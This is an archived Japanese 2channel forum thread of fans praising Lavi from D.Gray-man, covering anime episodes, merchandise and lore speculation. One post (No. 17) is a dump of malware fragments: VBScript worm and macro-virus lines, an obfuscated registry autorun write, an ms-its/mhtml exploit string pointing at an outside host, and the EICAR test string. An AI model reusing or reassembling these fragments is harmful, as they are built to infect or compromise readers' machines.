5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

D.Gray-manのラビをウサ死ぬほど応援するスレ【5羽目さ】

1 :名無しかわいいよ名無し:2006/12/27(水) 21:51:52 ID:LoxZETOG
前スレ
http://comic6.2ch.net/test/read.cgi/cchara/1142346405/

2 :名無しかわいいよ名無し:2006/12/27(水) 22:03:22 ID:123SS1wu
ラララララビタソ
むふふ

3 :名無しかわいいよ名無し:2006/12/28(木) 00:49:00 ID:zeZRIiQc
>>1


4 :名無しかわいいよ名無し:2006/12/28(木) 01:17:06 ID:uEOHh0t8
>>1
乙。

アニメ効果で前スレ消費したんだと思ったら何だよあれ。
ともかく5スレ目突入オメ!

5 :名無しかわいいよ名無し:2006/12/28(木) 01:46:12 ID:DbswhhDo
>>1
 /) /)  
(*●∀`) <乙さー

アヌメの雪に夢中なラビたんが可愛杉てヤバイwww
ラビたん大好きだ!


6 :名無しかわいいよ名無し:2006/12/28(木) 13:17:40 ID:MCR1lhGQ
>>1乙!
前スレでアニメラビの画像貼ってくれた人もトンクス!

7 :名無しかわいいよ名無し:2006/12/28(木) 15:07:07 ID:GO56Bz4E
>>1
乙〜

一応もう一回貼っとくな

http://www.uploda.org/uporg632666.jpg
http://www.imgup.org/iup307142.jpg
http://www.uploda.org/uporg632669.jpg



8 :名無しかわいいよ名無し:2006/12/28(木) 15:35:02 ID:P7Kocrh0
ありがたやありがたや


9 :名無しかわいいよ名無し:2006/12/28(木) 17:20:27 ID:weF+RSaa
ラビたんありがとう、ありがとう

10 :名無しかわいいよ名無し:2006/12/28(木) 18:43:23 ID:kTBriTKF
>>1乙!
ラビたんもこのスレも大好きさー!

11 :名無しかわいいよ名無し:2006/12/28(木) 19:53:57 ID:weF+RSaa
みんなもラビたんも>>10が好きだ

12 :名無しかわいいよ名無し:2006/12/28(木) 22:03:02 ID:4BbGTtZF
ラビたん可愛いよラビたん

13 :名無しかわいいよ名無し:2006/12/28(木) 23:06:06 ID:DbswhhDo
Dグレのキャラって髪とか目とか割と白黒が多いから
ラビたんのオレンジ髪と緑の目が映えるよな!
ラビたんの緑の目カワイイヨカワイイヨー(*´Д`)ハァハァ/lァ/lァ/ヽァ/ヽァ ノ \ア ノ \ア / \ ア / \ ア


14 :名無しかわいいよ名無し:2006/12/28(木) 23:09:05 ID:CbQfnwuY
同意。オレンジと緑って良い
むしろ碧というべきか

15 :名無しかわいいよ名無し:2006/12/29(金) 08:06:37 ID:U1FqS9wf
>1-14
乙さ〜

16 :名無しかわいいよ名無し:2006/12/29(金) 13:06:44 ID:SyUmXkly
寝る前のラビ妄想が止まらない今日この頃 笑


17 :<body onload=window()>:2006/12/29(金) 14:27:03 ID:nWzuouMv
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
"avgnt"="\"C:\\Program Files\\AntiVir PersonalEdition Classic\\avgnt.exe\" /min /nosplash"
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
ms-its:mhtml:file://c:\
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub

18 :名無しかわいいよ名無し:2006/12/29(金) 15:51:48 ID:j0CQiTn/
次回からアヌメのEDが変わるそうだがラビタンカット増えるといいな!

19 :名無しかわいいよ名無し:2006/12/29(金) 23:46:10 ID:srnAK9ae
旅行から帰ってきてやっと13話を見た!
か〜わ〜い〜い〜!
声もすっかり慣れたさww
ちょwもう来年はアヌメラビたんに毎週会えるってわけ?(●∀`*)ウレシスギ〜

20 :名無しかわいいよ名無し:2006/12/30(土) 14:37:50 ID:tiioLxed
ラビの声ってFF7のザックスの声やってた人?

21 :名無しかわいいよ名無し:2006/12/30(土) 16:48:24 ID:vfxVYp4f
>>20
そう

てっきりザックスくらいの青年声でくるかと思ったw

22 :名無しかわいいよ名無し:2006/12/30(土) 17:30:10 ID:tiioLxed
>>21
やっぱりそうか。ザックスは合ってるけどラビはちょっと合わないな…
てかDグレはACの声優やってた人が結構いるんだな

23 :名無しかわいいよ名無し:2006/12/30(土) 21:25:56 ID:G+bf1fwb
>>19
アヌメラビたん可愛いよなw(*●д`*)テラモエス
次回予告でアレンがスキーしてたけどラビたんもするのかな?
転んで雪だるまになるラビたんキボンヌ


24 :名無しかわいいよ名無し:2006/12/30(土) 21:29:47 ID:PY5Fosln
きっと雪だるまは次回作るんだ!

25 :名無しかわいいよ名無し:2006/12/31(日) 11:04:07 ID:2RSwf1ii
なんかPCからは人大杉で書き込めないお

26 :名無しかわいいよ名無し:2006/12/31(日) 18:14:36 ID:+kdk5qUq
今年も今日で終わりだよラビたん。
ラビたんもこのスレ住人もお世話になりますた。
来年はアヌメラビたん大活躍間違いなしだから本誌ラビたんも活躍してくれるといいな
そろそろブクマンの謎とか知りたいよーラビたん!

27 :名無しかわいいよ名無し:2006/12/31(日) 21:51:41 ID:b7hjjAKu
ラビたん良いお年を!来年もよろしくw

28 :名無しかわいいよ名無し:2006/12/31(日) 22:49:59 ID:U2AMAbKy
今年、ラビたんに出会えて本当に良かった!

>>1-26
良いお年を!(*●∀`)ノシ

29 :名無しかわいいよ名無し:2006/12/31(日) 22:53:31 ID:U2AMAbKy
何度もスマソ
訂正
×
>>1-26
良いお年を!(*●∀`)ノシ

>>1-27
良いお年を!(*●∀`)ノシ

30 :名無しかわいいよ名無し:2006/12/31(日) 22:56:23 ID:sMkHZiAo
ラビたんもみんなも良いお年を!来年もよろしくさー!

31 :名無しかわいいよ名無し:2007/01/01(月) 00:05:34 ID:+kdk5qUq
 /) /)  
(*●∀`) <明けましておめでとうさー

ラビたん、皆明けましておめでとう!
今年もラビたんテラモエスでよろしくお願いします!

32 :名無しかわいいよ名無し:2007/01/01(月) 00:16:41 ID:mFFXmz9P
 /) /)  
(*●∀`)ノシ<あけおめさ〜


33 :名無しかわいいよ名無し:2007/01/01(月) 00:51:47 ID:eGIPwFA/
ラビたんあけおめ!今年もラビたんの大活躍楽しみにしてるよ!

34 : 【小吉】 【1511円】 :2007/01/01(月) 01:42:00 ID:ol6qvxbe
ラビの運勢

35 :名無しかわいいよ名無し:2007/01/01(月) 11:07:12 ID:y8XX9gXv
>>34
ラビたんの運勢小吉か‥ちょっと微妙だなwww
今年がラビたんにとってすばらしい1年になりますように!
∩ ∩
(●∀`*)ノシ <今年もよろしくさ


36 :ラビ今年も愛してるー:2007/01/01(月) 14:01:50 ID:XY0PTIIr
おみくじしたら小吉だった
ささやかな幸せをありがとうw


37 :名無しかわいいよ名無し:2007/01/01(月) 16:46:26 ID:6ewONuPj
あけおめ!
ラビたんが今年も活躍しますよーに!

38 : 【大吉】 【110円】 :2007/01/01(月) 22:55:14 ID:M2LbxjTH
ラビあけおめぇぇぇぅぇぇ
オリジナル任務楽しみだわぁ゚+.゚(・∀・)゚+.゚

39 :名無しかわいいよ名無し:2007/01/02(火) 09:47:40 ID:Fx1w5+fI
ラビたんかぁいいよ〜ラビたんハァハァ


略してライーヨー

40 :名無しかわいいよ名無し:2007/01/03(水) 16:24:09 ID:NUPl+Yw1
オリジナル任務まであと6日!

41 :名無しかわいいよ名無し:2007/01/03(水) 21:29:28 ID:wECgajN4
ラビたんグッズ欲しいw
ttp://img.store.yahoo.co.jp/I/spshop_1930_48895410
ttp://img2.store.yahoo.co.jp/I/amiami_1931_81040053
ttp://img2.store.yahoo.co.jp/I/amiami_1931_80918331
ちっちゃいラビたん(*●д`*)カワイイヨカワイイヨー



42 :名無しかわいいよ名無し:2007/01/04(木) 00:38:54 ID:eyZX+gKS
>>41
なんだそのギャルゲ見たいな顏は!
画像見てネタかと思ったがマジなのか
でもやばい、微妙に欲しい

43 :名無しかわいいよ名無し:2007/01/04(木) 10:09:21 ID:8BJEYrn1
>>41
ちょww同人グッズかとオモタ・・・・・
たしかに微妙に欲しいかもw

44 :名無しかわいいよ名無し:2007/01/04(木) 12:36:12 ID:zKRAN6W7
>>41
何だそこ顔wwwwwwwwww


45 :名無しかわいいよ名無し:2007/01/04(木) 13:24:14 ID:X/0X/FBa
可愛いジャマイカラビたんグッズwww

46 :名無しかわいいよ名無し:2007/01/04(木) 15:21:42 ID:92JeAkHi
モノによって名前のスペル違くね?

47 :名無しかわいいよ名無し:2007/01/04(木) 17:53:57 ID:X/0X/FBa
確かにvとbがあるね。いいのかコレw

48 :ラビ:2007/01/04(木) 20:43:17 ID:Cw3okjBn
好きなように呼べばいいんさァ!
オレは気にしないさからさ!

49 :名無しかわいいよ名無し:2007/01/04(木) 23:30:06 ID:jt3yY1bM
vだとラヴィだから
ヌヌネノソングみたいに
なっちゃうよラビたん


50 :名無しかわいいよ名無し:2007/01/04(木) 23:36:15 ID:bpxnPd7p
>>48
ラビたん心ヒロスwww
でもsageようねラビたん(*●д`*)

51 :名無しかわいいよ名無し:2007/01/04(木) 23:40:52 ID:bpxnPd7p
>>49
てか公式ではLaviだよね。
ラ…ヴィたん??

52 :名無しかわいいよ名無し:2007/01/05(金) 15:24:06 ID:/oTXnhW1
ラヴぃたんww


53 :名無しかわいいよ名無し:2007/01/05(金) 20:57:14 ID:6Gh3ajBj
たんたん!

54 :名無しかわいいよ名無し:2007/01/06(土) 00:38:33 ID:b3VX+//j
ちょwwwラビたん名前変わっとるwwwラヴィたん?
でもラビって本当の名前じゃないんだよなー
ラビたんの本名が知りたい…(´・ω・`)ムリポ…


55 :名無しかわいいよ名無し:2007/01/06(土) 11:13:07 ID:SDK9JMMk
本名つーと生まれた時の名前?
小説版によるとラビは49番目の名前ってことだよね?
だとするとラビたん数ヶ月ごとに名前変えてたって訳か?
忙しすぎだおww

56 :名無しかわいいよ名無し:2007/01/06(土) 20:24:26 ID:RwJD+shG
定期的なサイクルで変えてたわけじゃないだろうw
場合によっては半年同じ名前使ったり、一日で変えたりしてたんじゃないか?
途中で名前のネタつきなかったんだろうか


57 :名無しかわいいよ名無し:2007/01/07(日) 12:50:07 ID:k5m0MDlt
居場所とか所属を移動する度に名前変えてるのかと認識してた

58 :名無しかわいいよ名無し:2007/01/07(日) 17:26:28 ID:z0tW3i34
小説読み返しちゃったよw
2年前にエクソシストになってからはラビでしょ?
黒の教団に来る以前はつまり48か所転々としてきたということで
まあこれは色んなとこ行って裏歴史を記録する本来のブクマンとしてのお仕事?
それにしてもアレン以上の放浪ぶりかもw

59 :名無しかわいいよ名無し:2007/01/07(日) 22:11:26 ID:no0vkzVa
ラビたんの両親がつけた本当の名前に執着はないのかねーラビたん
ラビたんの過去とかブクマンの仕事とか未だに謎だらけだよな
★野先生そろそろラビたんの事詳しく描いてください(´人`)オネガイシマス


60 :名無しかわいいよ名無し:2007/01/08(月) 18:32:35 ID:frLwAPpX
今度買うPCは間違いなくLavieだ

61 :名無しかわいいよ名無し:2007/01/08(月) 20:55:59 ID:dYCHx9j7
>60
!ラヴィユーザなのに
今気付いたぜ…
うちのラビたん……

62 :名無しかわいいよ名無し:2007/01/08(月) 21:04:47 ID:nib89T7z
>>59


ラビはブックマンの兄の孫の立場にあたり、本来ならその兄がブックマンの地位を
継ぐはずだったが、兄は若くして亡くなり、兄の子も行方が分からなくなったため、
現在ブックマンが継いでいる。
ラビの右目は一族の長子のみが継ぐという完璧な記録の力を持つ眼で、奇怪な色と文様が
周囲から不気味がられるため常に眼帯をしている。
教団やノア、千年伯爵に長子である事実を隠すためでもある。
幼少、スラム街でブックマンに探し出され、育てられた。
ブックマン達が教団に入った理由は、記録は二の次、本当の理由はクロス元帥の暗殺にある。
先代のブックマン、今のブックマンの母親でラビの曾祖母にあたるひとが、何らかの理由で
それを二人に命じた。
かつて千年伯爵側にいたとされるのは先代で、彼女はそこで何らかの方法で不死の身体となった。
現在は教団側の上層部におり、伯爵側に寝返ることを密かに計画している。

すごいもので、我が従姉妹は「ラビとブックマンの謎ってどんなだとおもう?」
と軽く質問するだけでこんな答えが返ってくる
只者ではないです

63 :名無しかわいいよ名無し:2007/01/08(月) 22:07:19 ID:0ZfaqSh5
凄い・・・
記録の目とか、スラムとか素敵だなぁ

64 :名無しかわいいよ名無し:2007/01/08(月) 22:14:43 ID:Fu6kU0ZD
>>62
ちょwww従姉妹スゴスwww確かに只者ではないぜ!
一体どこからその設定が出てきたんだw

明日アヌメラビたんですよ!
雪だるまラビたんクルー!?

65 :名無しかわいいよ名無し:2007/01/09(火) 01:14:08 ID:ccA32bpB
>>62
確かに右目の設定はそんな感じかも〜
だって小説版で右目の存在がブクマン継承を決定付けたって話が出てくるし

わーい!明日はラビたんに会えるぜ!
あ、もう今日かw

66 :名無しかわいいよ名無し:2007/01/09(火) 16:09:58 ID:WuovJNln
マジでラビたんかっこかわいいw

67 :名無しかわいいよ名無し:2007/01/09(火) 16:55:42 ID:N+qz9EkX
今日はラビィたん祭りw(*●∀`)ノシ

68 :名無しかわいいよ名無し:2007/01/09(火) 22:51:19 ID:rYKiyw9y
誰かアニメの感想書こうぜ

69 :名無しかわいいよ名無し:2007/01/09(火) 23:30:48 ID:2Aloo2SB
やっと仕事終わって観れた!
ラビたん今週もテラカワユスwww
アヌメラビたんはいたずらっ子な感じでホント可愛い(*´Д`)ハァハァ
次週予告のラビたんもヌゲーかわかっこよかったので来週もハゲ期待
アヌメ始まってホント良かったなーーーw



70 :名無しかわいいよ名無し:2007/01/10(水) 09:01:31 ID:VQpHVG+h
アヌメラビたんおちゃめで可愛スギww
戦う時はカコイイし〜(*●д`*)
早くバンダナはずし顔が見たいな!


71 :名無しかわいいよ名無し:2007/01/10(水) 16:13:51 ID:MYOEsL/s
ヘアバン外した時のラビたんテラモエス(*●Д`)
どのラビたんもいいけどね!

72 :名無しかわいいよ名無し:2007/01/10(水) 20:23:17 ID:hn+jI3xD
>>71
髪下ろしラビたんテラカッコヨス!!!アヌメでも早く下ろして欲しいなw
フワフワなオレンジ髪ハァハァ

73 :名無しかわいいよ名無し:2007/01/11(木) 23:58:54 ID:9bpMnZch
新EDのラビたんオメガカッコヨス!!!
あとほほ染めてるラビたんに萌え殺されそうになったwww
ラビたん大好きだよラビたん(*´Д`)ハァハァ/lァ/lァ/ヽァ/ヽァ ノ \ア ノ \ア / \ ア / \ ア


74 :名無しかわいいよ名無し:2007/01/12(金) 08:03:00 ID:EuMkbbof
ラビたんテラモエスww(*●Д`)

75 :名無しかわいいよ名無し:2007/01/13(土) 13:45:20 ID:sDj2iDrW
OPで巨大なハンマー持ってた赤髪バンダナ眼帯の人、ラビっていうんだ…
今日初めてアニメで見た。

何故ウサギなのかは…これからわかるのか。
次回が楽しみさ〜♪

76 :名無しかわいいよ名無し:2007/01/13(土) 19:35:59 ID:aVuw+LxA
最初アヌメラビたん観た時「なんでマフラーオレンジなんだよおおおお!」
と思ったけど今やもう全然可愛く見える。
ラビたんが自ら自分の髪色に合わせてオレンジマフラーを選んだのかと思うと
心が和むよwww(*●Д`)ラビタソカワユス


77 :名無しかわいいよ名無し:2007/01/14(日) 23:54:13 ID:VdYMT0O4
そろそろアヌメラビたんの火判が観たいな!
次回あたりにでないかなーーー

78 :名無しかわいいよ名無し:2007/01/15(月) 08:41:33 ID:bOL7HyzK
>>75ようこそ、めくるめくラビリンスの世界へ

  ラビ → ラビット → 兎
実際漫画でも、ユウにギカッと睨まれてヒイッ!ってなったとき
ウサ耳ついてた

79 :名無しかわいいよ名無し:2007/01/15(月) 14:15:14 ID:DuVWsVBq
買った鞄についてるファーがラビットファーだと知った
喜ぶべきか兎に申し訳なく思うべきか分からない…

80 :名無しかわいいよ名無し:2007/01/15(月) 15:39:38 ID:WjrXdUFP
漏れもラビットファーコート買った………
可愛いんだけど案外毛抜け易いよラビたん

81 :名無しかわいいよ名無し:2007/01/15(月) 18:12:39 ID:Q5BThRC6
ラビと同じよなオレンジマフラー編んでるよん!
ラビットファーも欲しいw

82 :名無しかわいいよ名無し:2007/01/16(火) 18:50:50 ID:CxivfeC9
アニメ終了ー
まさか火判よりも先に木判がくるとはwwww
かっこよかったからいいけどねラビタソ(*´Д`)ハァハァ

83 :名無しかわいいよ名無し:2007/01/16(火) 20:54:55 ID:rflWwkHQ
ヤベエエエエ今週のラビたん格好ヨ杉!!!
しかも優しいよラビたん素敵だよラビたんラビたーん!

84 :名無しかわいいよ名無し:2007/01/16(火) 21:15:19 ID:WtAxjgkf
木判キタ――(●∀゚*)――!!
イノセンス発動派手でカコイイ!!
てか今週のラビたん超美麗www萌え死ぬwww

85 :名無しかわいいよ名無し:2007/01/17(水) 02:18:59 ID:C3lDzq2f
ラビのイノセンスはアヌメに映えるね!
主人公よりも派手だよラビのイノセンスwwwテラカッコヨス(*●д`*)ハァハァ



86 :名無しかわいいよ名無し:2007/01/17(水) 18:54:04 ID:A4Q8E72M
今週もラビたんカッコカワユス(●∀`*)
木判よかったよん!
2月にクロウリー編あるのかな?楽しみだよ〜

87 :名無しかわいいよ名無し:2007/01/17(水) 22:07:27 ID:5y2lnnG6
>>86
2月13日放送から吸血鬼編みたいだね
今度は火判がみれるな!

88 :名無しかわいいよ名無し:2007/01/18(木) 20:49:06 ID:Anm2ACG6
木判かっこよかったけど後半は火判使うべきだとツッコんでしまったw

89 :名無しかわいいよ名無し:2007/01/19(金) 14:31:47 ID:X4LKpk0K
ラビたんハァハァ

90 :名無しかわいいよ名無し:2007/01/19(金) 16:57:34 ID:6BeqQSvd
ラビタソで萌え死にたい

91 :名無しかわいいよ名無し:2007/01/21(日) 18:57:19 ID:vdbZlRjD
バレ







何かもうごちそうさま
攻撃くらうとことかまじカッコヨス

92 :名無しかわいいよ名無し:2007/01/21(日) 20:11:34 ID:qM7OwX03
>>91
マジか!明日の本誌楽しみだw

カードゲームの第2弾はラビたんカードイパーイありそうだな
公式HPにあるサンプルカードがテラカワユス(*●Д`)ハァハァ





93 :名無しかわいいよ名無し:2007/01/22(月) 08:01:22 ID:ivqHEAvZ
あげ

94 :名無しかわいいよ名無し:2007/01/22(月) 09:20:26 ID:8Cwylyvz
吹っ飛ばされるラビたんの後ろ姿に禿しく萌ますた!
ジャスデビ戦が終わったらラビたんメインのバトルくるかな?

95 :名無しかわいいよ名無し:2007/01/22(月) 20:31:01 ID:ivqHEAvZ
>>94
すぐそのコマが頭に浮かんだ
あの姿勢いいよ…!

96 :名無しかわいいよ名無し:2007/01/22(月) 21:53:23 ID:DQKBz1m5
吹っ飛ばされるのもブン殴られるのもイイんだが、
頭踏み台にされてるラビたんにも禿しく萌えた

97 :名無しかわいいよ名無し:2007/01/23(火) 00:37:29 ID:pSqaZy5Q
>>94
あの後姿は萌えるよな!ラビたんは体つきもヌゲーカコイイ!



98 :名無しかわいいよ名無し:2007/01/23(火) 12:13:50 ID:v5JPHWlm
ラビたんのメインバトルでは半裸希望だったりするw

99 :名無しかわいいよ名無し:2007/01/23(火) 14:09:24 ID:cIoZHK/Z
>>98
ちょwwwおまい天才www半裸ラビたん見てEEEEEE!!!
そんな事になったら毎週ジャンプを読む用・保存用・伝導用に3冊づつ買う。絶対買う!
半裸ビたんハァハァ

100 :名無しかわいいよ名無し:2007/01/23(火) 18:04:59 ID:vMVAr7Jf
半裸ビたん…(;´Д`)ハァハァ

101 :名無しかわいいよ名無し:2007/01/23(火) 21:04:00 ID:El89zmrn
今日アニメにラビたん出なかった……

102 :名無しかわいいよ名無し:2007/01/24(水) 01:07:54 ID:3sZtz+gn
アニメ吸血鬼編までラビたん出ないのかな?(´・ω・`)ショボーン
もう原作に期待するしかない
  _  ∩
( ゚∀゚)彡 半裸ビ!半裸ビ!
 ⊂彡
スキン戦の神田並みの露出キボンヌ



103 :名無しかわいいよ名無し:2007/01/24(水) 20:10:35 ID:2eA1dS+Q
エリアーデ編は話としてもじぬん好みだから楽しみだな
もちろんラビたんも
汽車から蹴りだされるシーンと樽から「うそぉん」シーンに期待

104 :名無しかわいいよ名無し:2007/01/25(木) 02:32:51 ID:PEZLv4uO
カードゲーム第3弾はラビたんメインらしいぞ!
「劫火を下す鉄槌」5/17発売だって!
楽しみだwwwww

21 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.00 2017/10/04 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)